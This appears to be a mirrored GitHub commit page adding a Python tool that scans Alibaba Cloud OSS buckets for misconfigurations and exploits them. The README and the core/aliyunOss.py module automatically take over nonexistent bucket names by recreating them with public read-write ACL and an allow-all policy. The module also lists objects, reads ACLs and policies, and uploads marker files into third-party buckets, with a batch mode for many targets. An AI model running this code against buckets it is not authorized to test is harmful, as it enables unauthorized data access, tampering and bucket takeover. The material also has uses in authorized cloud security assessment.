admin/Cloud-Bucket-Leak-Detection-Tools
1
0
Fork 0
mirror of https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git synced 2025-06-20 18:00:49 +00:00
Code Issues Packages Projects Releases Wiki Activity

AliyunOss

Browse Source 
完成阿里云存储桶的利用
This commit is contained in:
UzJu 2022-03-04 19:16:52 +08:00
parent fdfcebe9dd
commit d1eabcb4c0
9 changed files with 608 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
.DS_Store vendored Normal file
View File

Binary file not shown.

78
README.md
View File

@ -1,3 +1,81 @@
# Cloud-Bucket-Leak-Detection-Tools
想写个存储桶的利用,先给自己画个饼
**画饼进度**
1、阿里云存储桶利用
不太会用Git代码写的也烂有BUG直接提Issue即可好像我连issue可能都用不明白
# 0x00 依赖
+ pip3 install oss2
+ pip3 install colorlog
+ pip3 install logging
+ pip3 argparse
# 0x01 使用方法
```bash
git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
python3 main.py -h
```
随后在config/conf.py中写入自己的阿里云AK作用如下
1、如果可以劫持会用该AK创建同名的存储桶
2、用来验证合法用户
![image-20220304184757595](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304184757595.png)
## 1、当存储桶Policy权限可获取时
![image-20220304185015693](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185015693.png)
## 2、当存储桶不存在时(自动创建并劫持)
![image-20220304185434168](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185434168.png)
输入存储桶地址即可自动检测,功能如下
+ 1、检测当前存储桶是否可劫持
+ 如果可劫持自动在config中写入的AK账号上创建同命名的存储桶并开放所有权限
+ 2、检测当前存储桶是否可列出Object
+ 3、检测当前存储桶是否可获取ACL
+ 4、检测当前存储桶是否可获取Policy策略表
+ 5、检测存储桶是否可上传Object
## 一、阿里云存储桶利用
### 1、实现思路
首先实现了`OssBucketCheckFromSDK`
+ AliyunOssBucketDoesBucketExist
+ 用来判断当前存储桶是否存在首先如果存储桶存在那么就返回一个True继续走下面的流程如果存储桶不存在那么就调用OssBucketExploitFromSDK类创建存储桶并且设置ACL权限上传访问策略随后上传一个文件进行验证如果存储桶此时存在或者为AccessDenied继续走下面的流程
+ AliyunOssGetBucketObjectList
+ 判断是否可以遍历存储桶中的内容如果可以则会选择前3个内容进行遍历并显示
> 如果想遍历更多的内容可以查看aliyunOss.py中的AliyunOssGetBucketObjectList方法
+ AliyunOssGetBucketAcl
+ 判断能否访问当前Bucket的ACL如果可以的话就返回当前Bucket的ACL如果不可以就继续走下面的Check流程
+ AliyunOssGetBucketPolicy
+ 判断能否访问当前Bucket的Policy如果可以的话就会返回当前Bucket的ACL如果不可以就继续走下面的Check
+ AliyunOssGetBucketObject
+ 尝试上传一个文件,是否可以成功上传
###

189
config/BannerInfo.py Normal file
View File

@ -0,0 +1,189 @@
"""
Banner Info From http://patorjk.com/software/taag/#p=display&f=TRaC%20Mini&t=UzJu
"""
import random
Banner_1 = '''
,---._
.-- -.' \
,--, | | :
,'_ /| ,----, : ; | ,--,
.--. | | : .' .`| : | ,'_ /|
,'_ /| : . | .' .' .' | : : .--. | | :
| ' | | . . ,---, ' ./ : ,'_ /| : . |
| | ' | | | ; | .' / | ; || ' | | . .
: | | : ' ; `---' / ;--, ___ l | | ' | | |
| ; ' | | ' / / / .`|/ /\ J :: | : ; ; |
: | : ; ; | ./__; .'/ ../ `..- ,' : `--' \
' : `--' \; | .' \ \ ; : , .-./
: , .-./`---' \ \ ,' `--`----'
`--`----' "---....--'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_2 = '''
/$$ /$$ /$$$$$
| $$ | $$ |__ $$
| $$ | $$ /$$$$$$$$ | $$ /$$ /$$
| $$ | $$|____ /$$/ | $$| $$ | $$
| $$ | $$ /$$$$/ /$$ | $$| $$ | $$
| $$ | $$ /$$__/ | $$ | $$| $$ | $$
| $$$$$$/ /$$$$$$$$| $$$$$$/| $$$$$$/
\______/ |________/ \______/ \______/
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_3 = '''
.----------------. .----------------. .----------------. .----------------.
| .--------------. || .--------------. || .--------------. || .--------------. |
| | _____ _____ | || | ________ | || | _____ | || | _____ _____ | |
| ||_ _||_ _|| || | | __ _| | || | |_ _| | || ||_ _||_ _|| |
| | | | | | | || | |_/ / / | || | | | | || | | | | | | |
| | | ' ' | | || | .'.' _ | || | _ | | | || | | ' ' | | |
| | \ `--' / | || | _/ /__/ | | || | | |_' | | || | \ `--' / | |
| | `.__.' | || | |________| | || | `.___.' | || | `.__.' | |
| | | || | | || | | || | | |
| '--------------' || '--------------' || '--------------' || '--------------' |
'----------------' '----------------' '----------------' '----------------'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_4 = '''
.------..------..------..------.
|U.--. ||Z.--. ||J.--. ||U.--. |
| (\/) || :(): || :(): || (\/) |
| :\/: || ()() || ()() || :\/: |
| '--'U|| '--'Z|| '--'J|| '--'U|
`------'`------'`------'`------'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_5 = '''
___ ___ ___
/\ \ /\__\ ___ /\ \
\:\ \ /::| | /\__\ \:\ \
\:\ \ /:/:| | /:/__/ \:\ \
___ \:\ \ /:/|:| |__ /::\ \ ___ \:\ \
/\ \ \:\__\ /:/ |:| /\__\ \/\:\ \ /\ \ \:\__|
\:\ \ /:/ / \/__|:|/:/ / ~~\:\ \ \:\ \ /:/ /
\:\ /:/ / |:/:/ / \:\__\ \:\ /:/ /
\:\/:/ / |::/ / /:/ / \:\/:/ /
\::/ / |:/ / /:/ / \::/ /
\/__/ |/__/ \/__/ \/__/
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_6 = """
d b sSSSSSs d d b
S S s S S S
S S s S S S
S S s S S S
S S s d P S S
S S s S S S S
"sss" sSSSSSs "sss" "sss"
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
"""
Banner_7 = '''
_ _ _
| | | | ___ _ | | _ _
| |_| | |_ / | || | | +| |
\___/ _/__| _\__/ \_,_|
_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_8 = '''
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_9 = '''
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_10 = '''
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_11 = '''
_ _ _ _ _ _ _ _
(c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c)
/ ._. \ / ._. \ / ._. \ / ._. \
__\( Y )/__ __\( Y )/__ __\( Y )/__ __\( Y )/__
(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)
|| U || || Z || || J || || U ||
_.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._
(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)
`-' `-' `-' `-' `-' `-' `-' `-'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_12 = '''
===================================
= ==== ============== ========
= ==== =============== =========
= ==== =============== =========
= ==== == ======= === = =
= ==== ====== ======= === = =
= ==== ===== ======== === = =
= ==== ==== ==== === === = =
= == === ===== === === = =
== === === ===== =
===================================
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_13 = '''
>=> >=> >=>
>=> >=> >=>
>=> >=> >====>>=> >=> >=> >=>
>=> >=> >=> >=> >=> >=>
>=> >=> >=> >=> >=> >=>
>=> >=> >=> >> >=> >=> >=>
>====> >=======> >===> >==>=>
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
def echoRandomBannerInfo():
eval(f"print(Banner_{random.randint(1, 13)})")

1
config/UzJu.html Normal file
View File

@ -0,0 +1 @@
Put By https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git

7
config/__init__.py Normal file
View File

@ -0,0 +1,7 @@
#!/usr/bin/python3.8.4 (python版本)
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/2/28 5:25 PM
# @File : __init__.py

17
config/conf.py Normal file
View File

@ -0,0 +1,17 @@
#!/usr/bin/python3.8.4 (python版本)
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/2/28 5:18 PM
# @File : conf.py
from fake_useragent import UserAgent
UA = UserAgent(use_cache_server=False)
headers = {
"UserAgent": UA.random
}
AK = ""
SECRET = ""

14
config/echoToFile.py Normal file
View File

@ -0,0 +1,14 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/3/4 下午5:24
# @File : echoToFile.py
import csv
class Echo:
def __init__(self):
pass

202
core/aliyunOss.py Normal file
View File

@ -0,0 +1,202 @@
#!/usr/bin/python3.8.4 (python版本)
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/2/28 4:52 PM
# @File : aliyunOss.py
# 你猜我什么时候画的饼:)
'''
代码实现思路
1使用GET POST PUT的请求来获取
2使用OSS2 SDK实现
'''
# 以下代码思路是使用OssSDK来实现
from itertools import islice
import oss2
import json
from config import conf
import logging
import os
import csv
module_logger = logging.getLogger("mainModule.AliyunOss")
def putCsvInfoResult(target, info):
with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
f_csv = csv.writer(f)
rows = [
[f"{target}", info]
]
f_csv.writerows(rows)
def setCsvHeaders(target):
headers = ['存储桶地址', '权限']
with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
f_csv = csv.writer(f)
f_csv.writerow(headers)
class OssBucketExploitFromSDK:
def __init__(self, target, location):
self.target = target
self.location = location
auth = oss2.Auth(conf.AK, conf.SECRET)
self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
self.logger = logging.getLogger("mainModule.AliyunOss.Exploit.module")
def AliyunOssCreateBucket_Exp(self):
try:
self.bucket.create_bucket()
self.logger.info(f"BucketName {self.target} Ceate Success:)")
self.AliyunOssPutBucketAcl_Exp()
self.AliyunOssPutBucketPolicy_Exp()
self.AliyunOssPutObject_Exp()
self.AliyunOssGetBucketPolicy_Exp()
except Exception as e:
self.logger.warning(f"BucketName {self.target} Ceate FAILD:( {e}")
def AliyunOssPutBucketAcl_Exp(self):
try:
self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
self.logger.info(f"BucketName {self.target} Acl Permissions PUBLIC_READ_WRITE:)")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Acl Put FAILD:( {e}")
def AliyunOssGetBucketPolicy_Exp(self):
try:
result = self.bucket.get_bucket_policy()
policy_json = json.loads(result.policy)
self.logger.info(f"BucketName {self.target} Policy Get Success :)\n {policy_json}")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Policy Get FAILD:( {e}")
def AliyunOssPutBucketPolicy_Exp(self):
try:
bucket_info = self.bucket.get_bucket_info()
strategy = {
"Version": "1",
"Statement": [{
"Effect": "Allow",
"Action": [
"oss:*"
],
"Principal": [
"*"
],
"Resource": [
f"acs:oss:*:{bucket_info.owner.id}:{self.target}",
f"acs:oss:*:{bucket_info.owner.id}:{self.target}/*"
]
}]
}
self.bucket.put_bucket_policy(json.dumps(strategy))
self.logger.info(f"BucketName {self.target} Policy Put Success :)")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Policy Put FAILD:( {e}")
def AliyunOssPutObject_Exp(self):
try:
self.bucket.put_object_from_file("UzJu.html", f"{os.getcwd()}/config/UzJu.html")
self.logger.info(f"BucketName {self.target} Put Object Success:)")
self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Put Object FAILD:( {e}")
class OssBucketCheckFromSDK:
def __init__(self, target, location):
self.target = target
self.location = location
self.logger = logging.getLogger("mainModule.AliyunOss.module")
auth = oss2.Auth(conf.AK, conf.SECRET)
self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
self.Exploit = OssBucketExploitFromSDK(self.target, location)
# 设置csvHeaders头
# setCsvHeaders(f"{target}.{location}.aliyuncs.com")
self.headers = [['Bucket', 'ListObject', 'GetBucketPolicy', 'PutBucketPolicy', 'GetBucketAcl', 'PutBucketAcl', 'PutBucketObject']]
self.CheckResult = []
def AliyunOssPutBucketPolicy(self, getOssResource):
"""
PutBucketPolicy
危险操作会更改存储桶的策略组建议查看AliyunOssgetBucketPolicy来自行判断
是否拥有AliyunOssPutBucketPolicy权限如果用代码的方式写入会存在问题
1写入后无法还原当然这里可以使用备份原有的策略然后再上传新的策略这里又会遇到一个新的问题
如果只是存在PutBucketPolicy我们Put后是无法知道对方的ResourceID的
所以该函数只在OssBucketExploitFromSDK类中实现了详情请看AliyunOssPutBucketPolicy_Exp方法
"""
pass
def AliyunOssGetBucketPolicy(self):
try:
result = self.bucket.get_bucket_policy()
policy_json = json.loads(result.policy)
self.logger.info(f"Target: {self.target}, get Bucket Policy:)\n{policy_json}")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target}, Bucket Policy AccessDenied:(")
def AliyunOssBucketDoesBucketExist(self):
try:
self.bucket.get_bucket_info()
self.logger.info(f"Target: {self.target}, Bucket Exist:)")
return True
except oss2.exceptions.NoSuchBucket:
self.logger.warning(f"Target: {self.target}, NoSuckBucket:) Now Hijack Bucket")
self.Exploit.AliyunOssCreateBucket_Exp()
return False
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target}, AccessDenied:(")
return True
except Exception as e:
self.logger.error(f"Target: {self.target} Except INFO: {e}")
def AliyunOssGetBucketAcl(self):
try:
self.logger.info(f"Target: {self.target} Bucket Acl: {self.bucket.get_bucket_acl().acl}")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} get Bucket Acl AccessDenied:(")
def AliyunOssPutbucketAcl(self):
try:
self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
self.logger.info(f"Target: {self.target} Put Bucket Acl Success:)")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} Put Bucket Acl AccessDenied:(")
def AliyunOssGetBucketObjectList(self):
try:
self.logger.info("Try to list Object")
for Object in islice(oss2.ObjectIterator(self.bucket), 3):
self.logger.info(f"Object Name: {Object.key}")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} ListObject AccessDenid")
return
self.logger.info(f"Target: {self.target} Exsit traverse Object:)")
# putCsvInfoResult(f"{self.target}.{self.location}.aliyuncs.com", "ListObject")
def AliyunOssPutBucketObject(self):
try:
self.bucket.put_object_from_file('UzJu.txt', f'{os.getcwd()}/config/UzJu.html')
self.logger.info(f"Target: {self.target} Put Object Success:)")
self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} Put Object AccessDenied:(")
def CheckBucket(target, location):
try:
check = OssBucketCheckFromSDK(target, location)
if check.AliyunOssBucketDoesBucketExist():
check.AliyunOssGetBucketObjectList()
check.AliyunOssGetBucketAcl()
check.AliyunOssGetBucketPolicy()
check.AliyunOssPutBucketObject()
module_logger.info(">" * 80)
except Exception as e:
module_logger.error(f"Target: {target} Chceck Faild:( {e}")

100
main.py Normal file
View File

@ -0,0 +1,100 @@
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project UzJuSecurityTools
@File main.py
@Author UzJu
@Date 2022/2/22 18:19
@Email UzJuer@163.com
'''
import logging
import sys
import colorlog
import datetime
from config import BannerInfo
import requests
import argparse
from core import aliyunOss
NowTime = datetime.datetime.now().strftime('%Y-%m-%d_%H_%M_%S')
logger = logging.getLogger("mainModule")
log_colors_config = {
'DEBUG': 'white', # cyan white
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
# 输出到控制台
console_handler = logging.StreamHandler()
# 输出到文件
file_handler = logging.FileHandler(filename=f'./logs/{NowTime}.log', mode='a', encoding='utf8')
# 日志级别logger 和 handler以最高级别为准不同handler之间可以不一样不相互影响
logger.setLevel(logging.DEBUG)
console_handler.setLevel(logging.DEBUG)
file_handler.setLevel(logging.INFO)
# 日志输出格式
file_formatter = logging.Formatter(
fmt='[%(asctime)s.%(msecs)03d] %(filename)s -> %(funcName)s line:%(lineno)d [%(levelname)s] : %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
console_formatter = colorlog.ColoredFormatter(
fmt='%(log_color)s[%(asctime)s.%(msecs)03d] %(filename)s -> %(funcName)s line:%(lineno)d [%(levelname)s] : %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
log_colors=log_colors_config
)
console_handler.setFormatter(console_formatter)
file_handler.setFormatter(file_formatter)
# 重复日志问题:
# 1、防止多次addHandler
# 2、loggername 保证每次添加的时候不一样;
# 3、显示完log之后调用removeHandler
if not logger.handlers:
logger.addHandler(console_handler)
logger.addHandler(file_handler)
def initialize(target):
"""
UserDisable
错误消息UserDisable
问题原因账号欠费或者由于安全原因账号被禁用
解决方案请检查账号是否已欠费或联系技术支持进行安全受限核查
"""
try:
resp = requests.get(f"http://{target}")
print("Target>>>> ", target)
print("resp.info>>>> ", resp.text)
if 'html' in resp.text or 'UserDisable' in resp.text:
return False
else:
return True
except requests.exceptions.ConnectionError as e:
logger.error(f"Target: {target}ConnectionError Except INFO: {e}")
return False
if __name__ == '__main__':
BannerInfo.echoRandomBannerInfo()
try:
parser = argparse.ArgumentParser()
parser.add_argument('-aliyun', dest='aliyun', help='python3 -aliyun UzJu.oss-cn-beijing.aliyuncs.com')
parser.add_argument('-f', '--file', dest='file', help='python3 -f/--file url.txt')
args = parser.parse_args()
if args.aliyun:
getTargetBucket = args.aliyun.split(".")
aliyunOss.CheckBucket(getTargetBucket[0], getTargetBucket[1])
if args.file:
with open(args.file, 'r') as f:
for i in f.read().splitlines():
getTargetBucket = i.split(".")
aliyunOss.CheckBucket(getTargetBucket[0], getTargetBucket[1])
except KeyboardInterrupt:
logger.error("KeyError Out")